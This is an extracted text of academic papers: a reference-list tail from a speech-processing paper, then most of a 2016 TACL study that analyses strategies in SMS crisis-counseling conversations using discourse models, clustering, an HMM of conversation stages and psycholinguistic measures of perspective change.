ACL, pages 40–49. Chia-ying Lee, Yu Zhang, and James Glass. 2013. Joint learning of phonetic units and word pronunciations for ASR. In Proceedings of the Conference on Empirical Methods on Natural Language Processing (EMNLP), pages 182–192. Chia-ying Lee. 2014. Discovering Linguistic Structures in Speech: Models and Applications. Ph.D. thesis, Massachusetts Institute of Technology. Percy Liang, Slav Petrov, Michael I. Jordan, and Dan Klein. 2007. The infinite PCFG using hierarchical Dirichlet processes. In Processing of EMNLP, pages 688–697. Fergus R. McInnes and Sharon Goldwater. 2011. Un- supervised extraction of recurring words from infant- directed speech. In Proceedings of CogSci, pages 2006 – 2011. Daichi Mochihashi, Takeshi Yamada, and Naonori Ueda. 2009. Bayesian unsupervised word segmentation with nested Pitman-Yor language modeling. In Proceed- ings of ACL, pages 100–108. Graham Neubig, Masato Mimura, and Tatsuya Kawa- hara. 2012. Bayesian learning of a language model from continuous speech. The IEICE Transactions on Information and Systems, 95(2):614–625. Timothy J. O’Donnell. 2015. Productivity and Reuse in Language: A Theory of Linguistic Computation and Storage. The MIT Press, Cambridge, Massachusetts and London, England. D. C. Olivier. 1968. Stochastic Grammars and Language Acquisition Mechanisms. Ph.D. thesis, Harvard Uni- versity. Alex S. Park and James R. Glass. 2008. Unsupervised pattern discovery in speech. IEEE Transactions on Acoustics, Speech, and Signal Processing, 16(1):186– 197. Jim Pitman and Marc Yor. 1997. The two-parameter Poisson-Dirichlet distribution derived from a stable subordinator. The Annals of Probability, pages 855– 900. Jim Pitman. 1992. The two-parameter generalization of ewens’ random partition structure. Technical re- port, Department of Statistics University of California Berkeley. Jennifer R. Saffran, Richard N. Aslin, and Elissa L. New- port. 1996a. Statistical learning by 8-month-old in- fants. Science, 274(5294):1926–1928, December. Jennifer R. Saffran, Elissa L. Newport, and Richard N. Aslin. 1996b. Word segmentation: The role of dis- tributional cues. Journal of Memory and Language, 35:606–621. Odette Scharenborg, Vincent Wan, and Mirjam Ernestus. 2010. Unsupervised speech segmentation: An analy- sis of the hypothesized phone boundaries. Journal of the Acoustical Society of America, 127:1084–1095. Yaodong Zhang and James Glass. 2009. Unsuper- vised spoken keyword spotting via segmental DTW on Gaussian posteriorgrams. In Proceedings of ASRU, pages 398–403. Yaodong Zhang, Ruslan Salakhutdinov, Hung-An Chang, and James Glass. 2012. Resource configurable spoken query detection using deep Boltzmann machines. In Proceedings of ICASSP, pages 5161–5164. Yaodong Zhang. 2013. Unsupervised speech processing with applications to query-by-example spoken term de- tection. Ph.D. thesis, Massachusetts Institute of Tech- nology. 403 404 work_pcu6v2uc6zc3pdfyj2cy5s6h6e ---- Large-scale Analysis of Counseling Conversations: An Application of Natural Language Processing to Mental Health Tim Althoff∗, Kevin Clark∗, Jure Leskovec Stanford University {althoff, kevclark, jure}@cs.stanford.edu Abstract Mental illness is one of the most pressing pub- lic health issues of our time. While counsel- ing and psychotherapy can be effective treat- ments, our knowledge about how to conduct successful counseling conversations has been limited due to lack of large-scale data with la- beled outcomes of the conversations. In this paper, we present a large-scale, quantitative study on the discourse of text-message-based counseling conversations. We develop a set of novel computational discourse analysis meth- ods to measure how various linguistic aspects of conversations are correlated with conver- sation outcomes. Applying techniques such as sequence-based conversation models, lan- guage model comparisons, message cluster- ing, and psycholinguistics-inspired word fre- quency analyses, we discover actionable con- versation strategies that are associated with better conversation outcomes. 1 Introduction Mental illness is a major global health issue. In the U.S. alone, 43.6 million adults (18.1%) experience mental illness in a given year (National Institute of Mental Health, 2015). In addition to the person di- rectly experiencing a mental illness, family, friends, and communities are also affected (Insel, 2008). In many cases, mental health conditions can be treated effectively through psychotherapy and coun- seling (World Health Organization, 2015). However, it is far from obvious how to best conduct counsel- ing conversations. Such conversations are free-form without strict rules, and involve many choices that *Both authors contributed equally to the paper. could make a difference in someone’s life. Thus far, quantitative evidence for effective conversation strategies has been scarce, since most studies on counseling have been limited to very small sample sizes and qualitative observations (e.g., Labov and Fanshel, (1977); Haberstroh et al., (2007)). How- ever, recent advances in technology-mediated coun- seling conducted online or through texting (Haber- stroh et al., 2007) have allowed counseling ser- vices to scale with increasing demands and to col- lect large-scale data on counseling conversations and their outcomes. Here we present the largest study on counseling conversation strategies published to date. We use data from an SMS texting-based counseling service where people in crisis (depression, self-harm, sui- cidal thoughts, anxiety, etc.), engage in therapeutic conversations with counselors. The data contains millions of messages from eighty thousand counsel- ing conversations conducted by hundreds of coun- selors over the course of one year. We develop a set of computational methods suited for large-scale dis- course analysis to study how various linguistic as- pects of conversations are correlated with conversa- tion outcomes (collected via a follow-up survey). We focus our analyses on counselors instead of individual conversations because we are interested in general conversation strategies rather than prop- erties of specific issues. We find that there are sig- nificant, quantifiable differences between more suc- cessful and less successful counselors in how they conduct conversations. Our findings suggest actionable strategies that are associated with successful counseling: 463 Transactions of the Association for Computational Linguistics, vol. 4, pp. 463–476, 2016. Action Editor: Lillian Lee. Submission batch: 12/2015; Revision batch: 3/2016; 7/2016 Published 8/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. 1. Adaptability (Section 5): Measuring the dis- tance between vector representations of the lan- guage used in conversations going well and go- ing badly, we find that successful counselors are more sensitive to the current trajectory of the conversation and react accordingly. 2. Dealing with Ambiguity (Section 6): We de- velop a clustering-based method to measure differences in how counselors respond to very similar ambiguous situations. We learn that successful counselors clarify situations by writ- ing more, reflect back to check understanding, and make their conversation partner feel more comfortable through affirmation. 3. Creativity (Section 6.3): We quantify the di- versity in counselor language by measuring cluster density in the space of counselor re- sponses and find that successful counselors re- spond in a more creative way, not copying the person in distress exactly and not using too generic or “templated” responses. 4. Making Progress (Section 7): We develop a novel sequence-based unsupervised conversa- tion model able to discover ordered conversa- tion stages common to all conversations. Ana- lyzing the progression of stages, we determine that successful counselors are quicker to get to know the core issue and faster to move on to collaboratively solving the problem. 5. Change in Perspective (Section 8): We de- velop novel measures of perspective change us- ing psycholinguistics-inspired word frequency analysis. We find that people in distress are more likely to be more positive, think about the future, and consider others, when the coun- selors bring up these concepts. We further show that this perspective change is associated with better conversation outcomes consistent with psychological theories of depression. Further, we demonstrate that counseling success on the level of individual conversations is predictable using features based on our discovered conversation strategies (Section 9). Such predictive tools could be used to help counselors better progress through the conversation and could result in better counseling practices. The dataset used in this work has been re- leased publicly and more information on dataset ac- cess can be found at http://snap.stanford. edu/counseling. Although we focus on crisis counseling in this work, our proposed methods more generally apply to other conversational settings and can be used to study how language in conversations relates to con- versation outcomes. 2 Related Work Our work relates to two lines of research: Therapeutic Discourse Analysis & Psycholinguis- tics. The field of conversation analysis was born in the 1960s out of a suicide prevention center (Sacks and Jefferson, 1995; Van Dijk, 1997). Since then conversation analysis has been applied to various clinical settings including psychotherapy (Labov and Fanshel, 1977). Work in psycholinguistics has demonstrated that the words people use can re- veal important aspects of their social and psycho- logical worlds (Pennebaker et al., 2003). Previous work also found that there are linguistic cues as- sociated with depression (Ramirez-Esparza et al., 2008; Campbell and Pennebaker, 2003) as well as with suicude (Pestian et al., 2012). These find- ings are consistent with Beck’s cognitive model of depression (1967; cognitive symptoms of depres- sion precede the affective and mood symptoms) and with Pyszczynski and Greenberg’s self-focus model of depression (1987; depressed persons engage in higher levels of self-focus than non-depressed per- sons). In this work, we propose an operationalized psy- cholinguistic model of perspective change and fur- ther provide empirical evidence for these theoretical models of depression. Large-scale Computational Linguistics Applied to Conversations. Large-scale studies have re- vealed subtle dynamics in conversations such as co- ordination or style matching effects (Niederhoffer and Pennebaker, 2002; Danescu-Niculescu-Mizil, 2012) as well as expressions of social power and status (Bramsen et al., 2011; Danescu-Niculescu- Mizil et al., 2012). Other studies have connected writing to measures of success in the context of re- quests (Althoff et al., 2014), user retention (Althoff and Leskovec, 2015), novels (Ashok et al., 2013), and scientific abstracts (Guerini et al., 2012). Prior 464 http://snap.stanford.edu/counseling http://snap.stanford.edu/counseling work has modeled dialogue acts in conversational speech based on linguistic cues and discourse coher- ence (Stolcke et al., 2000). Unsupervised machine learning models have also been used to model con- versations and segment them into speech acts, top- ical clusters, or stages. Most approaches employ Hidden Markov Model-like models (Barzilay and Lee, 2004; Ritter et al., 2010; Paul, 2012; Yang et al., 2014) which are also used in this work to model progression through conversation stages. Very recently, technology-mediated counseling has allowed the collection of large datasets on coun- seling. Howes et al. (2014) find that symptom sever- ity can be predicted from transcript data with com- parable accuracy to face-to-face data but suggest that insights into style and dialogue structure are needed to predict measures of patient progress. Counseling datasets have also been used to predict the conversa- tion outcome (Huang, 2015) but without modeling the within-conversation dynamics that are studied in this work. Other work has explored how novel inter- faces based on topic models can support counselors during conversations (Dinakar et al., 2014a; 2014b; 2015; Chen, 2014). Our work joins these two lines of research by de- veloping computational discourse analysis methods applicable to large datasets that are grounded in ther- apeutic discourse analysis and psycholinguistics. 3 Dataset Description In this work, we study anonymized counseling con- versations from a not-for-profit organization provid- ing free crisis intervention via SMS messages. Text- based counseling conversations are particularly well suited for conversation analysis because all interac- tions between the two dialogue partners are fully ob- served (i.e., there are no non-textual or non-verbal cues). Moreover, the conversations are important, constrained to dialogue between two people, and outcomes can be clearly defined (i.e., we follow up with the conversation partner as to whether they feel better afterwards), which enables the study of how conversation features are associated with actual out- comes. Counseling Process. Any person in distress can text the organization’s public number. Incoming re- quests are put into a queue and an available coun- Dataset statistics Conversations 80,885 Conversations with survey response 15,555 (19.2%) Messages 3.2 million Messages with survey response 663,026 (20.6%) Counselors 408 Messages per conversation* 42.6 Words per message* 19.2 Table 1: Basic dataset statistics. Rows marked with * are computed over conversations with survey responses. selor picks the request from the queue and engages with the incoming conversation. We refer to the cri- sis counselor as the counselor and the person in dis- tress as the texter. After the conversation ends, the texter receives a follow-up question (“How are you feeling now? Better, same, or worse?”) which we use as our conversation quality ground-truth (we use binary labels: good versus same/worse, since we care about improving the situation). In contrast to previous work that has used human judges to rate a caller’s crisis state (Kalafat et al., 2007), we di- rectly obtain this feedback from the texter. Further- more, the counselor fills out a post-conversation re- port (e.g., suicide risk, main issue such as depres- sion, relationship, self-harm, suicide, etc.). All crisis counselors receive extensive training and commit to weekly shifts for a full year. Dataset Statistics. Our dataset contains 408 coun- selors and 3.2 million messages in 80,885 conversa- tions between November 2013 and November 2014 (see Table 1). All system messages (e.g., instruc- tions), as well as texts that contain survey responses (revealing the ground-truth label for the conversa- tion) were filtered out. Out of these conversations, we use the 15,555, or 19.2%, that contain a ground- truth label (whether the texter feels better or the same/worse after the conversation) for the follow- ing analyses. Conversations span a variety of issues of different difficulties (see rows one and two of Ta- ble 2). Approval to analyze the dataset was obtained from the Stanford IRB. 4 Defining Counseling Quality The primary goal of this paper is to study strategies that lead to conversations with positive outcomes. Thus, we require a ground-truth notion of conver- sation quality. In principle, we could study individ- 465 NA Depressed Relationship Self harm Family Suicide Stress Anxiety Other Success rate 0.556 0.612 0.659 0.672 0.711 0.573 0.696 0.671 0.537 Frequency 0.200 0.200 0.089 0.074 0.071 0.063 0.041 0.039 0.035 Frequency with more successful counselors 0.203 0.199 0.089 0.067 0.072 0.061 0.048 0.042 0.030 Frequency with less successful counselors 0.223 0.208 0.087 0.070 0.067 0.056 0.030 0.032 0.028 Table 2: Frequencies and success rates for the nine most common conversation issues (NA: Not available). On average, more and less successful counselors face the same distribution of issues. ual conversations and aim to understand what fac- tors make the conversation partner (texter) feel bet- ter. However, it is advantageous to focus on the conversation actor (counselor) instead of individual conversations. There are several benefits of focusing analy- ses on counselors (rather than individual conversa- tions): First, we are interested in general conversa- tion strategies rather than properties of main issues (e.g., depression vs. suicide). While each conver- sation is different and will revolve around its main issue, we assume that counselors have a particular style and strategy that is invariant across conversa- tions. Second, we assume that conversation qual- ity is noisy. Even a very good counselor will face some hard conversations in which they do every- thing right but are still unable to make their conver- sation partner feel better. Over time, however, the “true” quality of the counselor will become appar- ent. Third, our goal is to understand successful con- versation strategies and to make use of these insights in counselor training. Focusing on the counselor is helpful in understanding, monitoring, and improv- ing counselors’ conversation strategies. More vs. Less Successful Counselors. We split the counselors into two groups and then compare their behavior. Out of the 113 counselors with more than 15 labeled conversations of at least 30 messages each, we use the most successful 40 counselors as “more successful” counselors and the bottom 40 as “less successful” counselors. Their average success rates are 66.3-85.5% and 42.1-58.6%, respectively. While the counselor-level analysis is of primary con- cern, we will also differentiate between counselor behavior in “positive” versus “negative” conversa- tions (i.e., those that will eventually make the texter feel better vs. not). Thus, in the remainder of the paper we differentiate between more vs. less suc- cessful counselors and positive vs. negative conver- 0-20 20-40 40-60 60-80 80-100 Portion of conversation (% of messages) 12 14 16 18 20 22 24 A ve ra ge m es sa ge le ng th More successful counselors, positive conversations More successful counselors, negative conversations Less successful counselors, positive conversations Less successful counselors, negative conversations Figure 1: Differences in counselor message length (in #tokens) over the course of the conversation are larger between more and less successful counselors (blue cir- cle/red square) than between positive and negative con- versations (solid/dashed). Error bars in all plots corre- spond to bootstrapped 95% confidence intervals using the member bootstrapping technique from Ren et al. (2010). sations. Studying the cross product of counselors and conversations allows us to gain insights on how both groups behave in positive and negative conver- sations. For example, Figure 1 illustrates why differ- entiating between counselors and as well as conver- sations is necessary: differences in counselor mes- sage length over the course of the conversation are bigger between more and less successful counselors than between positive and negative conversations. Initial Analysis. Before focusing on detailed anal- yses of counseling strategies we address two impor- tant questions: Do counselors specialize in certain issues? And, do successful counselors appear suc- cessful only because they handle “easier” cases? To gain insights into the “specialization hypoth- esis” we make use the counselor annotation of the main issue (depression, self-harm, etc.). We com- pare success rates of counselors across different issues and find that successful counselors have a higher fraction of positive conversations across all issues and that less successful counselors typically do not excel at a particular issue. Thus, we conclude 466 that counseling quality is a general trait or skill and supporting that the split into more and less success- ful counselors is meaningful. Another simple explanation of the differences be- tween more and less successful counselors could be that successful counselors simply pick “easy” issues. However, we find that this is not the case. In par- ticular, we find that both counselor groups are very similar in how they select conversations from the queue (picking the top-most in 60.1% vs. 60.3%, respectively), work similar shifts, and handle a sim- ilar number of conversations simultaneously (1.98 vs. 1.83). Further, we find that both groups face sim- ilar distributions of issues over time (see Table 2). We attribute the largest difference, “NA” (main issue not reported), to the more successful counselors be- ing more diligent in filling out the post-conversation report and having fewer conversations that end be- fore the main issue is introduced. 5 Counselor Adaptability In the remainder of the paper we focus on factors that mediate the outcome of a conversation. First, we examine whether successful counselors are more aware that their current conversation is going well or badly and study how the counselor adapts to the situation. We investigate this question by looking for language differences between positive and neg- ative conversations. In particular, we compute a distance measure between the language counselors use in positive conversations and the language coun- selors use in negative conversations and observe how this distance changes over time. We capture the time dimension by breaking up each conversation into five even chunks of messages. Then, for each set of counselors (more successful or less successful), conversation outcome (positive or negative), and chunk (first 20%, second 20%, etc.), we build a TF-IDF vector of word occurrences to represent the language of counselors within this subset. We use the global inverse document (i.e., conversation) frequencies instead of the ones from each subset to make the vectors directly comparable and control for different counselors having differ- ent numbers of conversations by weighting conver- sations so all counselors have equal contributions. We then measure the difference between the “posi- 0-20 20-40 40-60 60-80 80-100 3ortLon of conversDtLon (% of PessDges) 0.012 0.013 0.014 0.015 0.016 0.017 0.018 0.019 D Ls tD nc e be tw ee n po sL tLv e D nd n eg Dt Lv e co nv er sD tLo ns 0ore successful counselors Less successful counselors Figure 2: More successful counselors are more varied in their language across positive/negative conversations, suggesting they adapt more. All differences between more successful and less successful counselors except for the 0-20 bucket were found to be statistically significant (p < 0.05; bootstrap resampling test). tive” and “negative” vector representations by taking the cosine distance in the induced vector space. We also explored using Jensen-Shannon divergence be- tween traditional probabilistic language models and found these methods gave similar results. Results. We find more successful counselors are more sensitive to whether the conversation is going well or badly and vary their language accordingly (Figure 2). At the beginning of the conversation, the language between positive and negative conver- sations is quite similar, but then the distance in lan- guage increases over time. This increase in distance is much larger for more successful counselors than less successful ones, suggesting they are more aware of when conversations are going poorly and adapt their counseling more in an attempt to remedy the situation. 6 Reacting to Ambiguity Observing that successful counselors are better at adapting to the conversation, we next examine how counselors differ and what factors determine the dif- ferences. In particular, domain experts have sug- gested that more successful counselors are better at handling ambiguity in the conversation (Levitt and Jacques, 2005). Here, we use ambiguity to refer to the uncertainty of the situation and the texter’s ac- tual core issue resulting from insufficiently short or uncertain descriptions. Does initial ambiguity of the situation negatively affect the conversation? How do more successful counselors deal with ambiguous sit- uations? 467 [4, 9] (9, 16] (16, 24] (24, 33] (33, 632] Length of situation setter (#tokens) 0.4 0.5 0.6 0.7 0.8 F ra ct io n o f p o si tiv e c o n v. More successful Less successful Figure 3: More ambiguous situations (length of situation setter) are less likely to result in positive conversations. (4, 8] (8, 15] (15, 23] (23, 32] (32, 476] Length of situation setter (#tokens) 0.0 0.5 1.0 1.5 2.0 2.5 |R e sp o n se | / |S itu a tio n s e tt e r| Counselor quality More successful Less successful Figure 4: All counselors react to short, ambiguous mes- sages by writing more (relative to the texter message) but more successful counselors do it more than less success- ful counselors. Ambiguity. Throughout this section we measure ambiguity in the conversation as the shortness of the texter’s responses in number of words. While ambi- guity could also be measured through concreteness ratings of the words in each message (e.g., using concreteness ratings from Brysbaert et al. (2014)), we find that results are very similar and that length and concreteness are strongly related and hard to distinguish. 6.1 Initial Ambiguity and Situation Setter It is challenging to measure ambiguity and reactions to ambiguity at arbitrary points throughout the con- versation since it strongly depends on the context of the entire conversation (i.e., all earlier messages and questions). However, we can study nearly identi- cal beginnings of conversations where we can di- rectly compare how more successful and less suc- cessful counselors react given nearly identical situa- tions (the texter first sharing their reason for texting in). We identify the situation setter within each con- versation as the first long message by the texter (typ- ically a response to a “Can you tell me more about what is going on?” question by the counselor). Results. We find that ambiguity plays an important role in counseling conversations. Figure 3 shows that more ambiguous situations (shorter length of situation setter) are less likely to result in success- ful conversations (we obtain similar results when measuring concreteness (Brysbaert et al., 2014) di- rectly). Further, we find that counselors generally react to short and ambiguous situation setters by writing significantly more than the texters (Figure 4; if counselors wrote exactly as much as the texter, we would expect a horizontal line y = 1). How- ever, more successful counselors react more strongly to ambiguous situations than less successful coun- selors. 6.2 How to Respond to Ambiguity Having observed that ambiguity plays an important role in counseling conversations, we now examine in greater detail how counselors respond to nearly identical situations. We match situation setters by representing them through TF-IDF vectors on bigrams and find similar situation setters as nearest neighbors within a certain cosine distance in the induced space.1 We only con- sider situation setters that are part of a dense cluster with at least 10 neighbors, allowing us to compare follow-up responses by the counselors (4829/12770 situation setters were part of one of 589 such clus- ters). We also used distributed word embeddings (e.g., (Mikolov et al., 2013)) instead of TF-IDF vec- tors but found the latter to produce better clusters. Based on counselor training materials we hypoth- esize that more successful counselors • address ambiguity by writing more themselves, • use more check questions (statements that tell the conversation partner that you understand 1 Threshold manually set after qualitative analysis of matches from randomly chosen clusters. Results were not overly sensitive to threshold choice, choice of representation (e.g., word vectors), and distance measure (e.g., Euclidean). 468 More S. Less S. Test % conversations successful 70.7 51.7 *** #messages in conversation 57.0 46.7 *** Situation setter length (#tokens) 12.1 10.7 *** C response length (#tokens) 15.8 11.8 *** T response length (#tokens) 20.4 18.8 *** % Cosine sim. C resp. to context 11.9 14.8 *** % Cosine sim. T resp. to context 7.6 7.3 – % C resp. w check question 12.6 4.1 *** % C resp. w suicide check 13.5 10.3 *** % C resp. w thanks 6.3 2.4 *** % C resp. w hedges 41.4 36.8 *** % C resp. w surprise 3.3 2.8 – Table 3: Differences between more and less success- ful counselors (C; More S. and Less S.) in responses to nearly identical situation setters (Sec. 6.1) by the texter (T). Last column contains significance levels of Wilcoxon Signed Rank Tests (*** p < 0.001, – p > 0.05). them while avoiding the introduction of any opinion or advice (Labov and Fanshel, 1977); e.g.“that sounds like...”), • check for suicidal thoughts early (e.g., “want to die”), • thank the texter for showing the courage to talk to them (e.g., “appreciate”), • use more hedges (mitigating words used to lessen the impact of an utterance; e.g., “maybe”, “fairly”), • and that they are less likely to respond with sur- prise (e.g., “oh, this sounds really awful”). A set of regular expressions is used to detect each class of responses (similar to the examples above). Results. We find several statistically significant dif- ferences in how counselors respond to nearly iden- tical situation setters (see Table 3). While situation setters tend to be slightly longer for more success- ful counselors (suggesting that conversations are not perfectly randomly assigned), counselor responses are significantly longer and also spur longer texter responses. Further, the more successful counselors respond in a way that is less similar to the original situation setter (measured by cosine similarity in TF- IDF space) compared to less successful counselors (but the texter’s response does not seem affected). We do find that more successful counselors use more check questions, check for suicide ideation more of- ten, show the texter more appreciation, and use more hedges, but we did not find a significant difference with respect to responding with surprise. More successful Less successful Counselor quality 8 10 12 14 16 18 20 22 24 # S im ila r co u n se lo r re a ct io n s Conversation quality Positive Negative Figure 5: More successful counselors use less com- mon/templated responses (after the texter first explains the situation). This suggests that they respond in a more creative way. There is no significant difference between positive and negative conversations. 6.3 Response Templates and Creativity In Section 6.2, we observed that more successful counselors make use of certain templates (including check questions, checks for suicidal thoughts, affir- mation, and using hedges). While this could suggest that counselors should stick to such predefined tem- plates, we find that, in fact, more successful coun- selors do respond in more creative ways. We define a measure of how “templated” the counselors responses are by counting the number of similar responses in TF-IDF space for the counselor reaction (c.f., Section 6.2; again using a manually defined and validated threshold on cosine distance). Figure 5 shows that more successful counselors use less common/templated questions. This sug- gests that while more successful counselors ques- tions follow certain patterns, they are more creative in their response to each situation. This tailoring of responses requires more effort from the counselor, which is consistent with the results in Figure 1 that showed that more successful counselors put in more effort in composing longer messages as well. 7 Ensuring Conversation Progress After demonstrating content-level differences be- tween counselors, we now explore temporal differ- ences in how counselors progress through conversa- tions. Using an unsupervised conversation model, we are able to discover distinct conversation stages and find differences between counselors in how they 469 move through these stages. We further provide ev- idence that these differences could be related to power and authority by measuring linguistic coor- dination between the counselor and texter. 7.1 Unsupervised Conversation Model Counseling conversations follow a common struc- ture due to the nature of conversation as well as counselor training. Typically, counselors first intro- duce themselves, get to know the texter and their situation, and then engage in constructive prob- lem solving. We employ unsupervised conversation modeling techniques to capture this stage-like struc- ture within conversations. Our conversation model is a message-level Hid- den Markov Model (HMM). Figure 6 illustrates the basic model where hidden states of the HMM rep- resent conversation stages. Unlike in prior work on conversation modeling, we impose a fixed ordering on the stages and only allow transitions from the cur- rent stage to the next one (Figure 7). This causes it to learn a fixed dialogue structure common to all of the counseling sessions as opposed to conversa- tion topics. Furthermore, we separately model coun- selor and texter messages by treating their turns in the conversation as distinct states. We train the con- versation model with expectation maximization, us- ing the forward-backward algorithm to produce the distributions during each expectation step. We ini- tialized the model with each stage producing mes- sages according to a unigram distribution estimated from all messages in the dataset and uniform transi- tion probabilities. The unigram language models are defined over all words occurring more than 20 times (over 98% of words in the dataset), with other words replaced by an unknown token. Results. We explored training the model with vari- ous numbers of stages and found five stages to pro- duce a distinct and easily interpretable representa- tion of a conversation’s progress. Table 4 shows the words most unique to each stage. The first and last stages consist of the basic introductions and wrap- ups common to all conversations. In stage 2, the texter introduces the main issue, while the counselor asks for clarifications and expresses empathy for the situation. In stage 3, the counselor and texter dis- cuss the problem, particularly in relation to the other s1 Ck Ws0 w0,i s0 s2 w1,i w2,i Ws1 Ws2 Figure 6: Our conversation model generates a particular conversation Ck by first generating a sequence of hid- den states s0, s1, ... according to a Markov model. Each state si then generates a message as a bag of words wi,0, wi,1, ... according a unigram language model Wsi . Counselor turn Texter turn Stage 1 c1 Stage 2 Stage k c2 ck t1 t2 tk Figure 7: Allowed state transitions for the conversation model. Counselor and texter messages are produced by distinct states and conversations must progress through the stages in increasing order. people involved. In stage 4, the counselor and tex- ter discuss actionable strategies that could help the texter. This is a well-known part of crisis counselor training called “collaborative problem solving.” 7.2 Analyzing Counselor Progression Do counselors differ in how much time they spend at each stage? In order to explore how counselors progress through the stages, we use the Viterbi al- gorithm to assign each conversation the most likely sequence of stages according to our conversation model. We then compute the average duration in messages of each stage for both more and less suc- cessful counselors. We control for the different distributions of positive and negative conversations among more successful and less successful coun- selors by giving the two classes of conversations equal weight and control for different conversation lengths by only including conversations between 40 and 60 messages long. Results. We find that more successful counselors are quicker to move past the earlier stages, partic- 470 Stage Interpretation Top words for texter Top words for counselor 1 Introductions hi, hello, name, listen, hey hi, name, hello, hey, brings 2 Problem introduction dating, moved, date, liked, ended gosh, terrible, hurtful, painful, ago 3 Problem exploration knows, worry, burden, teacher, group react, cares, considered, supportive, wants 4 Problem solving write, writing, music, reading, play hobbies, writing, activities, distract, music 5 Wrap up goodnight, bye, thank, thanks, appreciate goodnight, 247, anytime, luck, 24 Table 4: The top 5 words for counselors and texters with greatest increase in likelihood of appearing in each stage. The model successfully identifies interpretable stages consistent with counseling guidelines (qualitative interpretation based on stage assignment and model parameters; only words occurring more than five hundred times are shown). 1 2 3 4 5 Stage 0.00 0.05 0.10 0.15 0.20 0.25 0.30 0.35 0.40 S ta ge d ur at io n (p er ce nt o f c on ve rs at io n) More successful counselors Less successful counselors Figure 8: More successful counselors are quicker to get to know texter and issue (stage 2) and use more of their time in the “problem solving” phase (stage 4). ularly stage 2, and spend more time in later stages, particularly stage 4 (Figure 8). This suggests they are able to more quickly get to know the texter and then spend more time in the problem solving phase of the conversation, which could be one of the rea- sons they are more successful. 7.3 Coordination and Power Differences One possible explanation for the more successful counselors’ ability to quickly move through the early stages is that they have more “power” in the conversation and can thus exert more control over the progression of the conversation. We explore this idea by analyzing linguistic coordination, which measures how much the conversation partners adapt to each other’s conversational styles. Research has shown that conversation participants who have a greater position of power coordinate less (i.e., they do not adapt their linguistic style to mimic the other conversational participant as strongly) (Danescu- Niculescu-Mizil et al., 2012). In our analysis, we use the “Aggregated 2” coordi- nation measure C(B, A) from Danescu-Niculescu- Mizil (2012), which measures how much group B coordinates to group A (a higher number means more coordination). The measure is computed by counting how often specific markers (e.g., auxiliary verbs) are exhibited in conversations. If someone tends to use a particular marker right after their con- versation partner uses that marker, it suggests they are coordinating to their partner. Formally, let set S be a set of exchanges, each involving an initial utterance u1 by a ∈ A and a reply u2 by b ∈ B. Then the coordination of b to A according to a linguistic marker m is: Cm(b, A) = P(Emu2→u1|E m u1 )−P(Emu2→u1) where Emu1 is the event that utterance u1 exhibits m (i.e., contains a word from category m) and Emu2→u1 is the event that reply u2 to u1 exhibits m. The prob- abilities are estimated across all exchanges in S. To aggregate across different markers, we average the coordination values of Cm(b, A) over all markers m to get a macro-average C(b, A). The coordination between groups B and A is then defined as the mean of the coordinations of all members of group B to- wards the group A. We use eight markers from Danescu-Niculescu- Mizil (2012), which are considered to be processed by humans in a generally non-conscious fashion: ar- ticles, auxiliary verbs, conjunctions, high-frequency adverbs, indefinite pronouns, personal pronouns, prepositions, and quantifiers. Results. Texters coordinate less than coun- selors, with texters having a coordination value of C(texter, counselor)=0.019 compared to the counselor’s C(counselor, texter)=0.030, suggest- ing that the texters hold more “power” in the conversation. However, more successful counselors coordinate less than less successful ones (C(more succ. counselors, texter)=0.029 vs. C(less succ. counselors, texter)=0.032). All differ- ences are statistically significant (p < 0.01; Mann- Whitney U test). This suggests that more successful counselors act with more control over the conversa- 471 tion, which could explain why they are quicker to make it through the initial conversation stages. 8 Facilitating Perspective Change Thus far, we have studied conversation dynamics and their relation to conversation success from the counselor perspective. In this section, we show that perspective change in the texter over time is asso- ciated with a higher likelihood of conversation suc- cess. Prior work has shown that day-to-day changes in writing style are associated with positive health outcomes (Campbell and Pennebaker, 2003), and existing theories link depression to a negative view of the future (Pyszczynski et al., 1987) and a self- focusing style (Pyszczynski and Greenberg, 1987). Here, we propose a novel measure to quantify three orthogonal aspects of perspective change within a single conversation: time, self, and sentiment. Fur- ther, we show that the counselor might be able to actively induce perspective change. Time. Texters start explaining their issue largely in terms of the past and present but over time talk more about the future (see Figure 9A; each plot shows the relative amount of words in the LIWC past, present, and future categories (Tausczik and Pennebaker, 2010)). We find that texters writing more about the future are more likely to feel better after the conversation. This suggests that changing the perspective from issues in the past towards the future is associated with a higher likelihood of suc- cessfully working through the crisis. Self. Another important aspect of behavior change is to what degree the texter is able to change their perspective from talking about themselves to con- sidering others and potentially the effect of their sit- uation on others (Pyszczynski and Greenberg, 1987; Campbell and Pennebaker, 2003). We measure how much the texter is focused on themselves by the rela- tive amount of first person singular pronouns (I, me, mine) versus third person singular/plural pronouns (she, her, him / they, their), again using LIWC. Fig- ure 9B shows that a smaller amount of self-focus is associated with more successful conversations (pro- viding support for the self-focus model of depres- sion (Pyszczynski and Greenberg, 1987)). We hy- pothesize that the lack of difference at the end of the conversation is due to conversation norms such as thanking the counselor (“I really appreciate it.”) even if the texter does not actually feel better. Sentiment. Lastly, we investigate how much a change in sentiment of the texter throughout the con- versation is associated with conversation success. We measure sentiment as the relative fraction of pos- itive words using the LIWC PosEmo and NegEmo sentiment lexicons. The results in Figure 9C show that texters always start out more negative (value be- low 0.5), but that the sentiment becomes more posi- tive over time for both positive and negative conver- sations. However, we find that the separation be- tween both groups grows larger over time, which suggests that a positive perspective change through- out the conversation is related to higher likelihood of conversation success. We find that both curves increase significantly at the very end of the con- versation. Again, we attribute this to conversation norms such as thanking the counselor for listening even when the texter does not actually feel better. Together with the result on talking about the fu- ture, these findings are consistent with the theory of Pyszczynski et al. (1987) that depression is related to a negative view of the future. Role of a Counselor. Given that positive conver- sations often exhibit perspective change, a natural question is how counselors can encourage perspec- tive change in the texter. We investigate this by ex- ploring the hypothesis that the texter will tend to talk more about something (e.g., the future), if the coun- selor first talks about it. We measure this tendency using the same coordination measures as Section 7.3 except that instead of using stylistic LIWC markers (e.g., auxiliary verbs, quantifiers), we use the LIWC markers relevant to the particular aspect of perspec- tive change (e.g., Future, HeShe, PosEmo). In all cases we find a statistically significant (p < 0.01; Mann-Whitney U-test) increase in the likelihood of the texter using a LIWC marker if the counselor used it in the previous message (~4-5% change). This link between perspective change and how the counselor conducts the conversation suggests that the coun- selor might be able to actively induce measurable perspective change in the texter. 472 0-20 20-40 40-60 60-80 80-100 3ortion of Fonversation (% of Pessages) 0.06 0.07 0.08 0.09 0.10 0.11 0.12 0.13 0.14 0.15 ) ut ur e re la tiv e fr eq ue nF y 3ositive Fonversations 1egative 